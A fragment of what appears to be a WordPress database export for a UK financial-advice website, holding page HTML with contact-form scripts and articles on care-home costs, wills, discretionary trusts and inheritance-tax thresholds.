jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-5397b8c320d6b\').iPhorm({\"id\":12,\"uniqueId\":\"5397b8c320d6b\",\"PHPSESSID\":\"1d9d9cbc4677de8e4b4a0ff4057d12bc\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    });\r\n	]]></script><form id=\"iphorm-5397b8c320d6b\" class=\"iphorm iphorm-form-12\" action=\"../will-you-avoid-care-home-costs/\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-12\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"12\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"5397b8c320d6b\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.uk/will-you-avoid-care-home-costs/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"1958\"/><input type=\"hidden\" name=\"post_title\" value=\"Will You Avoid Care Home Costs?\"/><h3 class=\"iphorm-title\">Contact Equity SMART&#13;\n                                        </h3><p class=\"iphorm-description\">For expert impartial advice and a FREE consultation with no obligation fill out the short form below.&#13;\n&#13;\n</p>&#13;\n                                    	            		<div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-12 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_12_1-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_12_1-element-spacer\">&#13;\n                    <label for=\"iphorm_12_1_5397b8c320d6b\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_12_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_12_1\" id=\"iphorm_12_1_5397b8c320d6b\" type=\"text\" name=\"iphorm_12_1\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_12_5-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_12_5-element-spacer\">&#13;\n                    <label for=\"iphorm_12_5_5397b8c320d6b\">&#13;\n                Contact Number                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_12_5-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_12_5\" id=\"iphorm_12_5_5397b8c320d6b\" type=\"text\" name=\"iphorm_12_5\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_12_2-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_12_2-element-spacer\">&#13;\n                    <label for=\"iphorm_12_2_5397b8c320d6b\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_12_2-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_12_2\" id=\"iphorm_12_2_5397b8c320d6b\" type=\"text\" name=\"iphorm_12_2\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-select iphorm_12_11-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-select iphorm_12_11-element-spacer\">&#13;\n                    <label for=\"iphorm_12_11_5397b8c320d6b\">&#13;\n                What Would You Like To Discuss?                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-select iphorm_12_11-input-wrap\">&#13;\n            <select class=\"iphorm-element-select  iphorm_12_11\" name=\"iphorm_12_11\" id=\"iphorm_12_11_5397b8c320d6b\"><option value=\"Pensions\">Pensions</option><option value=\"Insurance\">Insurance</option><option value=\"Trusts\">Trusts</option><option value=\"Investments\">Investments</option><option value=\"Wealth Management\">Wealth Management</option><option value=\"Other\">Other</option></select></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_12_10-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_12_10-element-spacer\">&#13;\n                    <label for=\"iphorm_12_10_5397b8c320d6b\">&#13;\n                Comments                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_12_10-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_12_10\" id=\"iphorm_12_10_5397b8c320d6b\" name=\"iphorm_12_10\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_12_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-12 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-12\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\" style=\"font-size: 18px;\"><span style=\"padding-top: 15px;padding-bottom: 15px;padding-right: 10px;padding-left: 27px;\"><em>Get Advice</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-5397b8c320d6b script\').remove();\r\n	//-->\r\n	]]></script></form></div></div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;\n	Will You Avoid Care Home Costs and Fees?','Will the new goverment cap of £75,000 towards care costs in 2017, mean you avoid selling your house and avoid care home costs and fees','publish','closed','closed','','will-you-avoid-care-home-costs-and-fees','','','2017-09-21 16:34:44','2017-09-21 16:34:44','',0,'http://www.equalitywalk.org.uk/will-you-avoid-care-home-costs-and-fees',0,'page','',0),(120,1,'2017-09-21 16:34:44','2017-09-21 16:34:44','<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\r\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\nCreating a standard will, in which all <a href=\"http://smallclaims.me.uk/inheritance-family-provision-act\" target=\"_blank\">inheritance</a> is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations. <a href=\"http://www.equalitywalk.org.uk/start-fundraising\">Find out more about wills</a>.\r\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\r\n<ul>\r\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n<h2>Other Important Considerations</h2>\r\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect. <a href=\"http://www.equalitywalk.org.uk/asset-protection-trust\">Protect your assets</a>.\r\n\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\n\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.\r\n<h2>What else should you consider?</h2>\r\n<em>When getting your affairs in order, there is much more to think about than just your will.</em>\r\n\r\nDon\'t leave your family in the lurch and begin plans for your funeral today. This means that all costs will be covered, as well as the burial or cremation.\r\n\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\">\r\n\r\nAlthough the initial planning of your funeral may seem morbid, however getting these preparations in order has many benefits. People are using pre-paid funeral plans to give peace of mind for them and their loved ones.\r\n\r\nFor residents based in Blackpool and local areas, we recommend FuneralGuide.co.uk as they can assist you with finding the right funeral director, save money and help you plan your funeral.  <a href=\"https://www.funeralguide.co.uk/funeral-directors/lancashire/blackpool/\" target=\"_blank\">Go to this site</a>.\r\n\r\n</div>\r\n</footer>','Wills and Trusts with Equity SMART','Any transfers between a husband and wife or civil partner are exempt from inheritance tax, so no inheritance tax is payable on the death of the first spouse','publish','closed','closed','','wills-and-trusts-with-equity-smart','','','2018-05-21 09:33:12','2018-05-21 09:33:12','',0,'http://www.equalitywalk.org.uk/wills-and-trusts-with-equity-smart',0,'page','',0),(121,1,'2017-09-21 16:34:44','2017-09-21 16:34:44','\r\n<div style=\"position: absolute; top: 0px; left: 50%; margin-left: -475px;\">\r\n\r\n\r\n<table border=\"0\" width=\"950\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"10\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"18\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"14\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"29\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"49\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"78\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"16\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"30\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"109\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"44\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"109\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"118\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"11\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"29\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"138\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"129\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"19\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td class=\"header\" style=\"background-image: url(\'/images/index_r1_c1.jpg\'); background-repeat: no-repeat;\" colspan=\"17\" valign=\"top\"><a href=\"/wealth-management-faqs\">wealth management FAQs</a> - <a href=\"/wealth-management-glossary\">glossary of wealth management terms</a> - <a href=\"/additional/financial-calendar\">financial calendar</a></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"38\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"17\"></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"27\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"9\"><a href=\"/\"><img id=\"investments_r3_c1\" src=\"/images/investments_r3_c1.jpg\" alt=\"Wealth Management - Financial Advice and Information\" width=\"353\" height=\"96\" name=\"investments_r3_c1\" border=\"0\" /></a></td>\r\n<td colspan=\"8\" valign=\"top\">\r\n<div style=\"font-size: 19px; text-align: right; margin-right: 30px;\">Offices throughout the UK,\r\n\r\ncall us for expert financial advice -\r\n\r\n<script type=\"text/javascript\" src=\"/jsapi.js\"></script><script type=\"text/javascript\"><![CDATA[ google.load(\'search\', \'1\'); google.setOnLoadCallback(function() { google.search.CustomSearchControl.attachAutoCompletion( \'011057125409238421392:utfk3c-gm7e\', document.getElementById(\'q\'), \'cse-search-box\'); }); ]]></script><form id=\"cse-search-box\" action=\"../../search-results/\">\r\n<div>\r\n<input name=\"cx\" type=\"hidden\" value=\"011057125409238421392:utfk3c-gm7e\" /><input name=\"cof\" type=\"hidden\" value=\"FORID:9\" /><input name=\"ie\" type=\"hidden\" value=\"UTF-8\" /><input id=\"q\" autocomplete=\"on\" name=\"q\" size=\"21\" type=\"text\" /><input name=\"sa\" type=\"submit\" value=\"Search our Site\" /></div>\r\n<script type=\"text/javascript\" src=\"/cse/brand_form_cse-search-box_amp_lang_en_amp_sitesearch_true.js\"></script>\r\n\r\n</form></div></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"96\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"5\"><a href=\"/\"><img id=\"investments_r4_c1\" src=\"/images/investments_r4_c1.jpg\" alt=\"Home Page\" width=\"120\" height=\"50\" name=\"investments_r4_c1\" border=\"0\" /></a></td>\r\n<td colspan=\"3\"><a href=\"/pension\"><img id=\"investments_r4_c6\" src=\"/images/investments_r4_c6.jpg\" alt=\"Pension Advice\" width=\"124\" height=\"50\" name=\"investments_r4_c6\" border=\"0\" /></a></td>\r\n<td colspan=\"2\"><a href=\"/investments\"><img id=\"investments_r4_c9\" src=\"/images/investments_r4_c9.jpg\" alt=\"Savings &amp; Investments\" width=\"153\" height=\"50\" name=\"investments_r4_c9\" border=\"0\" /></a></td>\r\n<td><a href=\"/trusts-protection\"><img id=\"investments_r4_c11\" src=\"/images/investments_r4_c11_f2.jpg\" alt=\"Trusts and Bonds\" width=\"109\" height=\"50\" name=\"investments_r4_c11\" border=\"0\" /></a></td>\r\n<td colspan=\"3\"><a href=\"/wealth-platform\"><img id=\"index_r4_c11\" src=\"/images/index_r4_c11.jpg\" alt=\"Wealth Management\" width=\"158\" height=\"50\" name=\"index_r4_c11\" border=\"0\" /></a></td>\r\n<td><a href=\"/about-us\"><img id=\"investments_r4_c15\" src=\"/images/investments_r4_c15.jpg\" alt=\"About Us\" width=\"138\" height=\"50\" name=\"investments_r4_c15\" border=\"0\" /></a></td>\r\n<td colspan=\"2\"><a href=\"/contact-us\"><img id=\"investments_r4_c16\" src=\"/images/investments_r4_c16.jpg\" alt=\"Contact Us\" width=\"148\" height=\"50\" name=\"investments_r4_c16\" border=\"0\" /></a></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"50\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"9\"><img id=\"investments_r5_c1\" src=\"/images/investments_r5_c1.jpg\" alt=\"\" width=\"10\" height=\"545\" name=\"investments_r5_c1\" border=\"0\" /></td>\r\n<td colspan=\"15\">\r\n<div id=\"breadcrumb\"><a href=\"/\">home</a> &gt; <a href=\"/trusts-protection\">trusts and protection</a> &gt; wills and trust</div>\r\n\r\n<h1>Wills and Trust</h1>\r\n</td>\r\n<td rowspan=\"4\"><img id=\"investments_r5_c17\" src=\"/images/investments_r5_c17.jpg\" alt=\"\" width=\"19\" height=\"260\" name=\"investments_r5_c17\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"63\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"6\"><img id=\"investments_r6_c2\" src=\"/images/investments_r6_c2.jpg\" alt=\"\" width=\"204\" height=\"9\" name=\"investments_r6_c2\" border=\"0\" /></td>\r\n<td colspan=\"9\" rowspan=\"8\" valign=\"top\"><img id=\"investments_r6_c8\" src=\"/images/wills-trusts.jpg\" alt=\"Wills and Trust\" width=\"450\" height=\"197\" name=\"investments_r6_c8\" align=\"right\" border=\"0\" />\r\n<div class=\"paracontent3\">\r\n\r\n\r\n\r\nAny transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.\r\n\r\n\r\n\r\nWith the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\n\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\n\r\n\r\nCreating a standard will, in which all inheritance is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\n\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations.\r\n\r\n\r\n\r\n</div></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"9\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" rowspan=\"7\" valign=\"top\"><img id=\"investments_r7_c2\" src=\"/images/investments_r7_c2.jpg\" alt=\"\" width=\"32\" height=\"480\" name=\"investments_r7_c2\" border=\"0\" /></td>\r\n<td class=\"related\" style=\"background-image: url(\'/images/investments_r7_c4.jpg\'); background-repeat: no-repeat;\" colspan=\"3\" valign=\"top\">Related Pages</td>\r\n<td rowspan=\"6\" valign=\"top\"><img id=\"investments_r7_c7\" src=\"/images/investments_r7_c7.jpg\" alt=\"\" width=\"16\" height=\"480\" name=\"investments_r7_c7\" align=\"top\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"34\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td class=\"relatedlinks\" style=\"background-image: url(\'/images/investments_r13_c4.jpg\'); background-position: bottom; background-repeat: no-repeat;\" colspan=\"3\" rowspan=\"5\" valign=\"top\"><a href=\"/asset-protection\">Asset Protection Trust</a>\r\n\r\nhelping you protect, what you could easily lose<a href=\"/discretionary-trusts\">Discretionary Trusts</a>\r\n\r\nthe trustees have \'discretion\' about how to use the income received by the trust\r\n\r\n<a href=\"/absolute-trust\">Absolute Trust</a>\r\n\r\na trust for when you are certain about who you wish to benefit\r\n\r\n<a href=\"/gift-loan-schemes\">Gift &amp; Loan Schemes</a>\r\n\r\nfind out how to reduce your Inheritance Tax liability\r\n\r\n<a href=\"/wills-trust\">Wills &amp; 